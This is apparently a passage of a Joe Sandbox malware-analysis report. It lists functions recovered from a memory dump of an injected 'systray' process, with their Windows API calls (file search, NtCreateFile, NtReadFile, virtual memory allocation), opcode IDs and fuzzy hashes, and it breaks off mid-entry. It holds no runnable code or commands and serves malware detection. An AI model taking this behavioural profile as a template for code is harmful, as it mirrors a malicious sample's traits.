                                  • Instruction Fuzzy Hash: A9329EB0D25229CBEB24CF55C895BEDBBB2BB46308F1481D9C40D6B281C7B55AC9CF54
                                  Function 0324B7F0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 0324B8CF
                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 0324B90E
                                  • FindClose.KERNELBASE(?), ref: 0324B919
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 3541575487-0
                                  • Opcode ID: c8d83f0e25d283be2636564ddf14a282b774cbb41172d69a0b0bfecc2e414885
                                  • Instruction ID: 3f609bfe61d3b32036a4084b01a37a24d98b4d3311436da080cb972f57daf3e4
                                  • Opcode Fuzzy Hash: c8d83f0e25d283be2636564ddf14a282b774cbb41172d69a0b0bfecc2e414885
                                  • Instruction Fuzzy Hash: 2E316075910349BBEB25DF60CC85FEB777C9B44704F144458BA48AB180EAB0EBC48BA0
                                  Function 03257600 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,000000F6,?,?), ref: 032576F0
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 374482896fea4e48aad56a70202b3e04039d9c1a2ab2480e034fdb141dea124a
                                  • Instruction ID: 9b091c476016c06931d774ddf41bd2c164ee98a1eea28a444677ca1d2c2da13c
                                  • Opcode Fuzzy Hash: 374482896fea4e48aad56a70202b3e04039d9c1a2ab2480e034fdb141dea124a
                                  • Instruction Fuzzy Hash: 7731A3B5A10209AFCB14DF99D881EEFB7F9AF8C314F108219FD18A7340D770A9518BA5
                                  Function 03257760 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,000000F6), ref: 0325783B
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: d296ab048922972cabb2cf029b9acb2a8c08720d2c3fd3403090b4fe5e79e1b0
                                  • Instruction ID: 47449e88f420d1c70d91e8fc3b50251e29403bc129abfc07119b50821c5cb2a8
                                  • Opcode Fuzzy Hash: d296ab048922972cabb2cf029b9acb2a8c08720d2c3fd3403090b4fe5e79e1b0
                                  • Instruction Fuzzy Hash: AE31E6B5A10209AFDB14DF99D840EEFB7B9EF8C314F108619FD18A7240D770A9518BA5
                                  Function 03257A40 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(0324142B,?,03256697,00000000,00000004,00003000,?,?,?,?,?,03256697,0324142B,032500F1,03256697,00000000), ref: 03257AFA
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: f6a972c6eee5b7ca679a70d489295d00a42ce2d7fc17b2626ee861755a27f94a
                                  • Instruction ID: fec0c922aa4cc824a8ae4458cc19c2d24777342b783139f2e33bdd2f2befde03
                                  • Opcode Fuzzy Hash: f6a972c6eee5b7ca679a70d489295d00a42ce2d7fc17b2626ee861755a27f94a
                                  • Instruction Fuzzy Hash: 7E21EBB5A10209AFDB14DF59DC41EEFB7B9EF88310F008519FD18AB280D7B4A9518BA5
                                  Function 03257850 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: a63f3b6cde42810433319b00a0bf33547df35df6364c5068cb59fe06edcc401e
                                  • Instruction ID: b2a5753e2d11ff7ac983293a0e60b29e6993d1503131af261f093239ad3304e1
                                  • Opcode Fuzzy Hash: a63f3b6cde42810433319b00a0bf33547df35df6364c5068cb59fe06edcc401e
                                  • Instruction Fuzzy Hash: B3016D76A60314BBE620EA68DC45FEB73ACEF85710F004509FE589B280DBB47A5487E5
                                  Function 032578E0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03257914
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 1010b141b799f08bc6b8236fe2fb27fb77327c420ff2ec9ea6ebb0c244e8a399
                                  • Instruction ID: 3c07d1726a99d9ef7e8bc831bf439cc68a8650af1b602200b7eadf333832328e
                                  • Opcode Fuzzy Hash: 1010b141b799f08bc6b8236fe2fb27fb77327c420ff2ec9ea6ebb0c244e8a399
                                  • Instruction Fuzzy Hash: 53E0467A2002147BC220EA59CC00F9B77ACDBC5620F004459FA08AB240C6B0BA1186B0
                                  Function 05244650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 635ee4d6a87f2639e2b8ff36baca92d4a7aca3dbe6869d75f1fee1dc898714b1
                                  • Instruction ID: 499fb8443a56b2e0e120a59f631aa1a784ff3389cc2d7c33345f009782eeef73
                                  • Opcode Fuzzy Hash: 635ee4d6a87f2639e2b8ff36baca92d4a7aca3dbe6869d75f1fee1dc898714b1
                                  • Instruction Fuzzy Hash: 729002726115004241407158484440660159BE13113E5C115B5554560C86A889559669
                                  Function 05244340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ffafd513c2a097e338ee8a331a949aeac795c8f953eed79fc0a72446c48f2aa7
                                  • Instruction ID: d5e8a5188e0b605898eb51f594165eb5b857ea23e82500b2867a6742e67073bd
                                  • Opcode Fuzzy Hash: ffafd513c2a097e338ee8a331a949aeac795c8f953eed79fc0a72446c48f2aa7
                                  • Instruction Fuzzy Hash: 62900232615800129140715848C454640159BE0311BA5C011F5424554C8AA48A565761
                                  Function 05242D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5710120c27dde6fe627869036b383e12863c66349a915ccbfc08be6a1ddc0a4a
                                  • Instruction ID: 06ebb8758faa4e16ed5cd35bd8922acb2b0f4c87b548ffaaadfefafb0165c8e7
                                  • Opcode Fuzzy Hash: 5710120c27dde6fe627869036b383e12863c66349a915ccbfc08be6a1ddc0a4a
                                  • Instruction Fuzzy Hash: C090023231140003D140715854586064015DBE1311FA5D011F5414554CD9A589565622
                                  Function 05242D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cd87b77917b980b184acc8d4c773b27b6bf41de033ab5d4c64384f68375730b3
                                  • Instruction ID: c760ecf85b9c9e284abd24b2be9b6706df5c483299d27b19cfa3a485e24d1ecd
                                  • Opcode Fuzzy Hash: cd87b77917b980b184acc8d4c773b27b6bf41de033ab5d4c64384f68375730b3
                                  • Instruction Fuzzy Hash: 0A90023A22340002D1807158544860A00158BD1212FE5D415B5015558CC9A589695721
                                  Function 05242DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d7174e34d3f6e3dcfaa110c4f61d40b1fdb41dbe22e9f814367a68f813c0dd18
                                  • Instruction ID: cd04b0e26c287a484edacaae22f6e95843498a38ce14a81ae8ffa58fb898a9de
                                  • Opcode Fuzzy Hash: d7174e34d3f6e3dcfaa110c4f61d40b1fdb41dbe22e9f814367a68f813c0dd18
                                  • Instruction Fuzzy Hash: 3790023221140413D1117158454470700198BD0251FE5C412B5424558D96E68A52A521
                                  Function 05242DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a2cda6495cfda7e59d452d0dda8826baf1be223e39e6f8c7bfba8bd499722e30
                                  • Instruction ID: fd2d15bd3bc48233a658318e45a3708f5c688f047c46c7bdb1c0f044b9676b92
                                  • Opcode Fuzzy Hash: a2cda6495cfda7e59d452d0dda8826baf1be223e39e6f8c7bfba8bd499722e30
                                  • Instruction Fuzzy Hash: DE900232252441525545B158444450740169BE02517E5C012B6414950C85B69956DA21
                                  Function 05242C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 66350748b935595fbd1ccd79026a5a04b2326b3dc8bb0c3bbec07da5dc3d55ce
                                  • Instruction ID: 80204b44979f6f028afddee12430c59ba6f656b13452409aca9c24ccf7aa5753
                                  • Opcode Fuzzy Hash: 66350748b935595fbd1ccd79026a5a04b2326b3dc8bb0c3bbec07da5dc3d55ce
                                  • Instruction Fuzzy Hash: B790023221140842D10071584444B4600158BE0311FA5C016B5124654D86A5C9517921
                                  Function 05242C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5c5e9051f169d85dfdffd14daebafa3d74aa68ef277eb25446a74c41b6296606
                                  • Instruction ID: f641d148de3ca5f831ba072604292df3531d89003fd05d1e95ad441091c66bda
                                  • Opcode Fuzzy Hash: 5c5e9051f169d85dfdffd14daebafa3d74aa68ef277eb25446a74c41b6296606
                                  • Instruction Fuzzy Hash: 9790023221148802D1107158844474A00158BD0311FA9C411B9424658D86E589917521
                                  Function 05242CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 87a5163e4a3c446b43ee2a5e0579096ab771fbbc14bfa29aac92757de289aea0
                                  • Instruction ID: 1ec55d567621b3cc9cbf31afca4ee4e025f0f8d683aceef9985e7274f2c03490
                                  • Opcode Fuzzy Hash: 87a5163e4a3c446b43ee2a5e0579096ab771fbbc14bfa29aac92757de289aea0
                                  • Instruction Fuzzy Hash: 1A90023221140402D1007598544864600158BE0311FA5D011BA024555EC6F589916531
                                  Function 05242F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: bd72aec617054f7d4e98824922eba85461e912f599422ead060abf813aff2155
                                  • Instruction ID: dc1476135c188bf50e64358cbbfcf7c3395abd48fe98c3a1475cc5e52b6f069b
                                  • Opcode Fuzzy Hash: bd72aec617054f7d4e98824922eba85461e912f599422ead060abf813aff2155
                                  • Instruction Fuzzy Hash: 0D90027235140442D10071584454B060015CBE1311FA5C015F6064554D86A9CD526526
                                  Function 05242FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a2a864e9f71fb0bb256e896c69b8e06cc040c22758dfe99fc6673d5d3cd11285
                                  • Instruction ID: 1822b668a0850ffd5d0392d874a773f691ea64e62bf11aa756cf0209a41f58f8
                                  • Opcode Fuzzy Hash: a2a864e9f71fb0bb256e896c69b8e06cc040c22758dfe99fc6673d5d3cd11285
                                  • Instruction Fuzzy Hash: 0C900232611400424140716888849064015AFE12217A5C121B5998550D85E989655A65
                                  Function 05242FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4eed27736d8fc44c41b0c3edff3a0a6e61446bb882b78dc319c8f2884bee0586
                                  • Instruction ID: 9b53fefe20cf77dbf4b205c50699e50632ca1a4cff21bf2a16dea31deff76b45
                                  • Opcode Fuzzy Hash: 4eed27736d8fc44c41b0c3edff3a0a6e61446bb882b78dc319c8f2884bee0586
                                  • Instruction Fuzzy Hash: B6900232221C0042D20075684C54B0700158BD0313FA5C115B5154554CC9A589615921
                                  Function 05242E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 856a7192ef109c022b780daf55711f6648e5ed839f4649b305187d789926f5b3
                                  • Instruction ID: 57dd970afaab323671e7d2696b5a47c7e7fa9424e4f8508b7d14f235e9a8addb
                                  • Opcode Fuzzy Hash: 856a7192ef109c022b780daf55711f6648e5ed839f4649b305187d789926f5b3
                                  • Instruction Fuzzy Hash: 0D90023261140502D10171584444616001A8BD0251FE5C022B6024555ECAB58A92A531
                                  Function 05242EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3ddc475c1093d68fde95c0d7b75f908ea9eebd6ebf40d9241ea27475b1ba15fb
                                  • Instruction ID: 9ac1704b7038cdb1e8b8e23ce80654fcf7edf4ef5dc3a53c04a395500ebbac3f
                                  • Opcode Fuzzy Hash: 3ddc475c1093d68fde95c0d7b75f908ea9eebd6ebf40d9241ea27475b1ba15fb
                                  • Instruction Fuzzy Hash: AF90027221180403D1407558484460700158BD0312FA5C011B7064555E8AB98D516535
                                  Function 05242B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6da4332056805c2ba458e04549ed6ba17ab52b33642b91da991354047f7f6ec4
                                  • Instruction ID: bfa9263a661274e59227abf670c17f9e9502b79d375efe2ed25c70a13b485ea3
                                  • Opcode Fuzzy Hash: 6da4332056805c2ba458e04549ed6ba17ab52b33642b91da991354047f7f6ec4
                                  • Instruction Fuzzy Hash: D690027221240003410571584454616401A8BE0211BA5C021F6014590DC5B589916525
                                  Function 05242BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4ef5f9c9870a684f1982b332a06c99cccc7787c72229aefebf39ac3c7fb34eb1
                                  • Instruction ID: 5c6bd153913eb5f2bb116c3c921a876edb2b65d9c18068a79430ad6fc1b5b339
                                  • Opcode Fuzzy Hash: 4ef5f9c9870a684f1982b332a06c99cccc7787c72229aefebf39ac3c7fb34eb1
                                  • Instruction Fuzzy Hash: 7490023261540802D1507158445474600158BD0311FA5C011B5024654D87E58B557AA1
                                  Function 05242BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b4c0d90af4a55344ce88668d2806f5a872a85f490c8da5760213abf7b54f57c7
                                  • Instruction ID: dbadf249cf41e4184c2650f86d32687ab3c8279bf97d5b363c6c4b62fc4fdcb4
                                  • Opcode Fuzzy Hash: b4c0d90af4a55344ce88668d2806f5a872a85f490c8da5760213abf7b54f57c7
                                  • Instruction Fuzzy Hash: E990023221544842D14071584444A4600258BD0315FA5C011B5064694D96B58E55BA61
                                  Function 05242BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 52cb96ec6ca2dad9afc177a2ba9cbe3ad5f435a4e9cc54434cf4e59a2bd83883
                                  • Instruction ID: 7101c408bcfdd1c57037ffbfd11217404ed333513e4c088a15115b0efd452fb0
                                  • Opcode Fuzzy Hash: 52cb96ec6ca2dad9afc177a2ba9cbe3ad5f435a4e9cc54434cf4e59a2bd83883
                                  • Instruction Fuzzy Hash: DF90023221140802D1807158444464A00158BD1311FE5C015B5025654DCAA58B597BA1
                                  Function 05242AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
